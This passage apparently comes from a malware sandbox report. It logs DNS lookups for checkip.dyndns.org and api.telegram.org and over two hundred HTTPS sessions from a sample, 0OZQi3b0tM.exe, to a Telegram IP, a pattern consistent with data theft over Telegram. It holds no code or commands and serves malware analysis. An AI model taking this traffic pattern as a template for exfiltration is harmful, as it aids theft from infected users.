                            Jun 26, 2022 09:32:40.297687054 CEST49773443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:40.297743082 CEST44349773149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:40.297837973 CEST49773443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:40.298846960 CEST49773443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:40.298886061 CEST44349773149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:40.358182907 CEST44349773149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:40.362586021 CEST49773443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:40.362639904 CEST44349773149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:40.362776041 CEST49773443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:40.362785101 CEST44349773149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:40.689845085 CEST44349773149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:40.689954042 CEST44349773149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:40.690109015 CEST49773443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:40.691152096 CEST49773443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:40.693145990 CEST49774443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:40.693183899 CEST44349774149.154.167.220192.168.2.5
                            Jun 26, 2022 09:32:40.693341017 CEST49774443192.168.2.5149.154.167.220
                            Jun 26, 2022 09:32:40.694036961 CEST49774443192.168.2.5149.154.167.220
                            TimestampSource PortDest PortSource IPDest IP
                            Jun 26, 2022 09:32:22.474344969 CEST5432253192.168.2.58.8.8.8
                            Jun 26, 2022 09:32:22.496325970 CEST53543228.8.8.8192.168.2.5
                            Jun 26, 2022 09:32:22.522830963 CEST6270453192.168.2.58.8.8.8
                            Jun 26, 2022 09:32:22.542670965 CEST53627048.8.8.8192.168.2.5
                            Jun 26, 2022 09:32:24.707330942 CEST5393453192.168.2.58.8.8.8
                            Jun 26, 2022 09:32:24.726130962 CEST53539348.8.8.8192.168.2.5
                            Jun 26, 2022 09:34:16.948779106 CEST5211353192.168.2.58.8.8.8
                            Jun 26, 2022 09:34:16.969172001 CEST53521138.8.8.8192.168.2.5
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                            Jun 26, 2022 09:32:22.474344969 CEST192.168.2.58.8.8.80x7988Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                            Jun 26, 2022 09:32:22.522830963 CEST192.168.2.58.8.8.80x1128Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                            Jun 26, 2022 09:32:24.707330942 CEST192.168.2.58.8.8.80xdad8Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                            Jun 26, 2022 09:34:16.948779106 CEST192.168.2.58.8.8.80x3900Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                            Jun 26, 2022 09:32:22.496325970 CEST8.8.8.8192.168.2.50x7988No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                            Jun 26, 2022 09:32:22.496325970 CEST8.8.8.8192.168.2.50x7988No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)
                            Jun 26, 2022 09:32:22.496325970 CEST8.8.8.8192.168.2.50x7988No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)
                            Jun 26, 2022 09:32:22.496325970 CEST8.8.8.8192.168.2.50x7988No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)
                            Jun 26, 2022 09:32:22.496325970 CEST8.8.8.8192.168.2.50x7988No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)
                            Jun 26, 2022 09:32:22.496325970 CEST8.8.8.8192.168.2.50x7988No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)
                            Jun 26, 2022 09:32:22.542670965 CEST8.8.8.8192.168.2.50x1128No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                            Jun 26, 2022 09:32:22.542670965 CEST8.8.8.8192.168.2.50x1128No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)
                            Jun 26, 2022 09:32:22.542670965 CEST8.8.8.8192.168.2.50x1128No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)
                            Jun 26, 2022 09:32:22.542670965 CEST8.8.8.8192.168.2.50x1128No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)
                            Jun 26, 2022 09:32:22.542670965 CEST8.8.8.8192.168.2.50x1128No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)
                            Jun 26, 2022 09:32:22.542670965 CEST8.8.8.8192.168.2.50x1128No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)
                            Jun 26, 2022 09:32:24.726130962 CEST8.8.8.8192.168.2.50xdad8No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                            Jun 26, 2022 09:34:16.969172001 CEST8.8.8.8192.168.2.50x3900No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                            • api.telegram.org
                            • checkip.dyndns.org
                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            0192.168.2.549759149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            1192.168.2.549769149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            10192.168.2.549778149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            100192.168.2.549947149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            101192.168.2.549948149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            102192.168.2.549949149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            103192.168.2.549950149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            104192.168.2.549951149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            105192.168.2.549952149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            106192.168.2.549953149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            107192.168.2.549954149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            108192.168.2.549955149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            109192.168.2.549956149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            11192.168.2.549779149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            110192.168.2.549957149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            111192.168.2.549962149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            112192.168.2.549964149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            113192.168.2.549965149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            114192.168.2.549966149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            115192.168.2.549967149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            116192.168.2.549968149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            117192.168.2.549969149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            118192.168.2.549970149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            119192.168.2.549972149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            12192.168.2.549780149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            120192.168.2.549973149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            121192.168.2.549974149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            122192.168.2.549975149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            123192.168.2.549976149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            124192.168.2.549977149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            125192.168.2.549978149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            126192.168.2.549979149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            127192.168.2.549980149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            128192.168.2.549982149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            129192.168.2.549983149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            13192.168.2.549781149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            130192.168.2.549984149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            131192.168.2.549985149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            132192.168.2.549986149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            133192.168.2.549987149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            134192.168.2.549988149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            135192.168.2.549989149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            136192.168.2.549990149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            137192.168.2.549992149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            138192.168.2.549993149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            139192.168.2.549994149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            14192.168.2.549782149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            140192.168.2.549995149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            141192.168.2.549996149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            142192.168.2.549997149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            143192.168.2.549998149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            144192.168.2.549999149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            145192.168.2.550000149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            146192.168.2.550001149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            147192.168.2.550002149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            148192.168.2.550003149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            149192.168.2.550004149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            15192.168.2.549783149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            150192.168.2.550005149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            151192.168.2.550006149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            152192.168.2.550007149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            153192.168.2.550008149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            154192.168.2.550009149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            155192.168.2.550010149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            156192.168.2.550011149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            157192.168.2.550012149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            158192.168.2.550013149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            159192.168.2.550014149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            16192.168.2.549784149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            160192.168.2.550015149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            161192.168.2.550016149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            162192.168.2.550017149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            163192.168.2.550018149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            164192.168.2.550019149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            165192.168.2.550020149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            166192.168.2.550021149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            167192.168.2.550022149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            168192.168.2.550023149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            169192.168.2.550025149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            17192.168.2.549785149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            170192.168.2.550026149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            171192.168.2.550028149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            172192.168.2.550029149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            173192.168.2.550030149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            174192.168.2.550031149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            175192.168.2.550032149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            176192.168.2.550034149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            177192.168.2.550035149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            178192.168.2.550037149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            179192.168.2.550039149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            18192.168.2.549786149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            180192.168.2.550040149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            181192.168.2.550042149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            182192.168.2.550043149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            183192.168.2.550045149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            184192.168.2.550047149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            185192.168.2.550050149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            186192.168.2.550051149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            187192.168.2.550054149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            188192.168.2.550056149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            189192.168.2.550059149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            19192.168.2.549787149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            190192.168.2.550060149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            191192.168.2.550065149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            192192.168.2.550068149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            193192.168.2.550070149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            194192.168.2.550074149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            195192.168.2.550077149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            196192.168.2.550079149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            197192.168.2.550080149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            198192.168.2.550082149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            199192.168.2.550084149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            2192.168.2.549770149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            20192.168.2.549788149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            200192.168.2.550085149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            201192.168.2.550087149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            202192.168.2.550088149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            203192.168.2.550091149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            204192.168.2.550094149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            205192.168.2.550095149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            206192.168.2.550098149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            207192.168.2.550100149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            208192.168.2.550102149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            209192.168.2.550103149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            21192.168.2.549789149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            210192.168.2.550104149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            211192.168.2.550108149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            212192.168.2.550112149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            213192.168.2.550114149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            214192.168.2.550118149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            215192.168.2.550119149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            216192.168.2.550124149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            217192.168.2.550126149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
